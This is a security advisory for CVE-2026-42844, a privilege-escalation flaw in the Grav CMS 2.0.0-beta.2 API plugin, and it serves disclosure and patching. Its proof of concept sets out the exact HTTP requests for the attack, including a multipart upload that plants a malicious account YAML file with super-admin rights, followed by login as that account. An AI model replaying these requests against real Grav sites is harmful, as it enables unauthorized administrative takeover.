GHSA-6XX2-M8WV-756H
Vulnerability from github – Published: 2026-05-06 21:19 – Updated: 2026-05-13 16:41
VLAI
Summary
Low-privileged Grav API users can create super-admin accounts via blueprint-upload
Details
Summary
In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges.
This results in full administrative compromise of the Grav API.
Details
The vulnerability is located in the API plugin's blueprint upload flow:
user/plugins/api/classes/Api/ApiRouter.php:261user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417user/plugins/api/classes/Api/Controllers/AuthController.php:41-55
The issue exists because /api/v1/blueprint-upload accepts caller-controlled destination and scope values and uses them to resolve the final filesystem write target.
When the request uses:
destination=self@:scope=users/anything
The server resolves the write target to the shared account directory:
user/accounts/
The upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext password: field on first login, an attacker can create a fully functional administrator account with api.super.
The required attacker privilege is low:
access:
api:
access: true
media:
write: true
PoC
Step 1: Authenticate as the low-privileged API user
POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close
{"username":"uploader","password":"Upload123A"}
Extract:
UPLOADER_TOKEN = <access_token from response>
Attachment:
Step 2: Upload a malicious account YAML file
POST /api/v1/blueprint-upload HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <UPLOADER_TOKEN>
Content-Type: multipart/form-data; boundary=----CodexBoundaryF01
Connection: close
------CodexBoundaryF01
Content-Disposition: form-data; name="destination"
self@:
------CodexBoundaryF01
Content-Disposition: form-data; name="scope"
users/anything
------CodexBoundaryF01
Content-Disposition: form-data; name="file"; filename="pwned.yaml"
Content-Type: text/yaml
email: attacker@example.com
fullname: attacker
title: Site Administrator
state: enabled
password: Passw0rd!123
access:
site:
login: true
api:
super: true
------CodexBoundaryF01--
Expected result:
{
"data": [
{
"name": "pwned.yaml",
"path": "user/accounts/pwned.yaml"
}
]
}
Attachment:
Step 3: Log in as the newly created account
POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close
{"username":"pwned","password":"Passw0rd!123"}
Expected result:
{
"data": {
"user": {
"username": "pwned",
"super_admin": true
}
}
}
Attachment:
Step 4: Verify privileged API access
GET /api/v1/system/info HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <PWNED_TOKEN>
Connection: close
Expected result:
The request succeeds and returns system-level information.
Attachment:
Impact
This is an authenticated vertical privilege-escalation vulnerability.
Any API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once api.super access is obtained, the attacker gains full control over the CMS management API and can:
- modify content
- alter configuration
- manage users
- install or update plugins/themes
- access system-level administration features
In a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.
This issue was reproduced locally:
- the upload response returned
user/accounts/pwned.yaml - logging in as
pwnedsucceeded - the new account had
super_admin = true - privileged endpoints such as
/api/v1/system/infowere accessible
Severity
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0-beta.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42844"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T21:19:21Z",
"nvd_published_at": "2026-05-12T22:16:34Z",
"severity": "HIGH"
},
"details": "## Summary\n\nIn Grav `2.0.0-beta.2`, a low-privileged authenticated API user with `api.media.write` can abuse `/api/v1/blueprint-upload` to write an arbitrary YAML file into `user/accounts/`, then log in as the newly created account with `api.super` privileges.\n\nThis results in full administrative compromise of the Grav API.\n\n## Details\n\nThe vulnerability is located in the API plugin\u0027s blueprint upload flow:\n\n- `user/plugins/api/classes/Api/ApiRouter.php:261`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417`\n- `user/plugins/api/classes/Api/Controllers/AuthController.php:41-55`\n\nThe issue exists because `/api/v1/blueprint-upload` accepts caller-controlled `destination` and `scope` values and uses them to resolve the final filesystem write target.\n\nWhen the request uses:\n\n- `destination=self@:`\n- `scope=users/anything`\n\nThe server resolves the write target to the shared account directory:\n\n```text\nuser/accounts/\n```\n\nThe upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext `password:` field on first login, an attacker can create a fully functional administrator account with `api.super`.\n\nThe required attacker privilege is low:\n\n```yaml\naccess:\n api:\n access: true\n media:\n write: true\n```\n\n## PoC\n\n### Step 1: Authenticate as the low-privileged API user\n\n```http\nPOST /api/v1/auth/token HTTP/1.1\nHost: 127.0.0.1:8123\nContent-Type: application/json\nConnection: close\n\n{\"username\":\"uploader\",\"password\":\"Upload123A\"}\n```\n\nExtract:\n\n```text\nUPLOADER_TOKEN = \u003caccess_token from response\u003e\n```\n\nAttachment:\n\n\u003cimg width=\"1480\" height=\"825\" alt=\"login-uploader\" src=\"https://github.com/user-attachments/assets/5aeda840-4a37-4365-8e46-caec88066541\" /\u003e\n\n### Step 2: Upload a malicious account YAML file\n\n```http\nPOST /api/v1/blueprint-upload HTTP/1.1\nHost: 127.0.0.1:8123\nX-API-Token: \u003cUPLOADER_TOKEN\u003e\nContent-Type: multipart/form-data; boundary=----CodexBoundaryF01\nConnection: close\n\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"destination\"\n\nself@:\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"scope\"\n\nusers/anything\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"file\"; filename=\"pwned.yaml\"\nContent-Type: text/yaml\n\nemail: attacker@example.com\nfullname: attacker\ntitle: Site Administrator\nstate: enabled\npassword: Passw0rd!123\naccess:\n site:\n login: true\n api:\n super: true\n------CodexBoundaryF01--\n```\n\nExpected result:\n\n```json\n{\n \"data\": [\n {\n \"name\": \"pwned.yaml\",\n \"path\": \"user/accounts/pwned.yaml\"\n }\n ]\n}\n```\n\nAttachment:\n\n\u003cimg width=\"1484\" height=\"797\" alt=\"upload\" src=\"https://github.com/user-attachments/assets/0b24c03f-cac5-4b4d-840c-52ac0840969f\" /\u003e\n\n### Step 3: Log in as the newly created account\n\n```http\nPOST /api/v1/auth/token HTTP/1.1\nHost: 127.0.0.1:8123\nContent-Type: application/json\nConnection: close\n\n{\"username\":\"pwned\",\"password\":\"Passw0rd!123\"}\n```\n\nExpected result:\n\n```json\n{\n \"data\": {\n \"user\": {\n \"username\": \"pwned\",\n \"super_admin\": true\n }\n }\n}\n```\n\nAttachment:\n\n\u003cimg width=\"1494\" height=\"830\" alt=\"pwned-login\" src=\"https://github.com/user-attachments/assets/7a1ab7fc-d3fb-4077-9b61-09cd947241fe\" /\u003e\n\n### Step 4: Verify privileged API access\n\n```http\nGET /api/v1/system/info HTTP/1.1\nHost: 127.0.0.1:8123\nX-API-Token: \u003cPWNED_TOKEN\u003e\nConnection: close\n```\n\nExpected result:\n\nThe request succeeds and returns system-level information.\n\nAttachment:\n\n\u003cimg width=\"1480\" height=\"831\" alt=\"system-info\" src=\"https://github.com/user-attachments/assets/31677d61-3dbd-4ea6-9fbe-80799a628cc2\" /\u003e\n\n## Impact\n\nThis is an authenticated vertical privilege-escalation vulnerability.\n\nAny API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once `api.super` access is obtained, the attacker gains full control over the CMS management API and can:\n\n- modify content\n- alter configuration\n- manage users\n- install or update plugins/themes\n- access system-level administration features\n\nIn a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.\n\nThis issue was reproduced locally:\n\n- the upload response returned `user/accounts/pwned.yaml`\n- logging in as `pwned` succeeded\n- the new account had `super_admin = true`\n- privileged endpoints such as `/api/v1/system/info` were accessible",
"id": "GHSA-6xx2-m8wv-756h",
"modified": "2026-05-13T16:41:19Z",
"published": "2026-05-06T21:19:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42844"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Low-privileged Grav API users can create super-admin accounts via blueprint-upload"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…